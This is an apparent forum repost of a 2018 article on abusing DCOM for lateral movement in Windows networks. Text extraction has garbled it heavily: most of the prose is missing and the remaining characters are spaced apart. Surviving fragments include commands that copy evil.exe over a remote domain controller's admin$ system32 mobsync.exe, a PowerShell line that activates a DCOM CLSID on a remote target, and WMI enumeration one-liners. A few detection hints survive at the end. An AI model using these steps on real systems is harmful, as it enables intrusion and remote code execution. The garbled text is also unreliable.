搜索

[12913] 2018-07-06_如何利用DCOM实现横向渗透

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2018-07-06_如何利用DCOM实现横向渗透 D C O M A l p h a _ h 4 c k   F r e e B u f   2 0 1 8 - 0 7 - 0 6 D C O M P a y l o a d t a r g e t a d m i n $ s y s t e m 3 2 m o b s y n c . e x e P o w e r S h e l l 西 D C O M P a y l o a d 1 .   2 .   3 .   D C O M 4 .   D C O M M a t t   N e l s o n   ( e n i g m a 0 x 3 ) D / C O M M M C 2 0 S h e l l W i n d o w s , S h e l l B r o w s e r W i n d o w E x c e l O u t l o o k P h i l i p   T s u k e r m a n   ( @ P h i l i p T s u k e r m a n ) W M I   D C O M -   d i r t a r g e t s y s t e m 3 2 m o b s y n c . e x e       / / s h o u l d n o t   e x i s t - c o p y   e v i l . e x e   t a r g e t a d m i n $ s y s t e m 3 2 m o b s y n c . e x e - [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m C L S I D ( " C 9 4 7 D 5 0 F - 3 7 8 E - 4 F F 6 - 8 8 3 5 - F C B 5 0 3 0 5 2 4 4 D " , " t a r g e t " ) )
C L S I D D I R C : W I N D O W S s y s t e m 3 2 I n t e l C p H D C P S v c . e x e 1 .   I n t e l C p H D C P S v c . e x e 2 .   西 3 .   D C O M 使 G e t - C i m I n s t a n c e W i n 3 2 _ D C O M A p p l i c a t i o n I n t e l C p H D C P S v c . e x e H D C P L o c a l S e r v e r 3 2 I n P r o c S e r v e r 3 2 I n t e l C p H D C P S v c D C O M D C O M D C O M W i n d o w s   2 0 1 2 L o c a l S e r v e r 3 2 I n P r o c S e r v e r 3 2   D L L g w m i W i n 3 2 _ C O M S e t t i n g   - c o m p u t e r n a m e   1 2 7 . 0 . 0 . 1   |   f t   L o c a l S e r v e r 3 2   - a u t o s i z e   | O u t - S t r i n g   - w i d t h   4 0 9 6   |   o u t - f i l e d c o m _ e x e s . t x t
g w m i W i n 3 2 _ C O M S e t t i n g   - c o m p u t e r n a m e   1 2 7 . 0 . 0 . 1   |   f t   I n P r o c S e r v e r 3 2   - a u t o s i z e   | O u t - S t r i n g   - w i d t h   4 0 9 6   |   o u t - f i l e d c o m _ d l l s . t x t 使 $ f i l e =   g c   C : U s e r s t e s t d e s k t o p d c o m _ t h i n g s . t x t f o r e a c h ( $ b i n p a t h   i n   $ f i l e )   { $ b i n p a t h c m d . e x e   / c   d i r   $ b i n p a t h   >   $ n u l l } % S y s t e m R o o t % s y s t e m 3 2 m o b s y n c . e x e F i l e N o t   F o u n d m o b s y n c M i c r o s o f t m o b s y n c . e x e A p p I D C L S I D A p p I D C L S I D
[ C 9 4 7 D 5 0 F - 3 7 8 E - 4 F F 6 - 8 8 3 5 - F C B 5 0 3 0 5 2 4 4 D ] C L S I D D C O M P a y l o a d 1 .   D C O M 2 .   P a y l o a d W i n d o w s   1 0 W i n d o w s   2 0 1 2 D C P a y l o a d m o b s y n c . e x e m o b s y n c . e x e P a y l o a d e v i l . e x e D C d i r   C : e v i l . e x e d i r   a c m e d c a d m i n $ s y s t e m 3 2 m o b s y n c . e x e c o p y   C : e v i l . e x e   a c m e d c a d m i n $ s y s t e m 3 2 m o b s y n c . e x e d i r   a c m e d c a d m i n $ s y s t e m 3 2 m o b s y n c . e x e
D C O M P a y l o a d W i n d o w s 1 0 W i n d o w s 2 0 1 2 m o b s y n c . e x e n o t e p a d . e x e   P a y l o a d 1 .   D C O M 2 .   D C O M 1 .   e n i g m a 0 x 3 @ P h i l i p T s u k e r m a n I o C 2 .   使 [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m C L S I D ( " C 9 4 7 D 5 0 F - 3 7 8 E - 4 F F 6 - 8 8 3 5 - F C B 5 0 3 0 5 2 4 4 D " , " t a r g e t " ) )
3 .   4 .   5 .   P o w e r S h e l l P o w e r S h e l l C L M 6 .   D C O M I D 1 0 0 1 0 C L S I D *   b o h o p s F B A l p h a _ h 4 c k F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理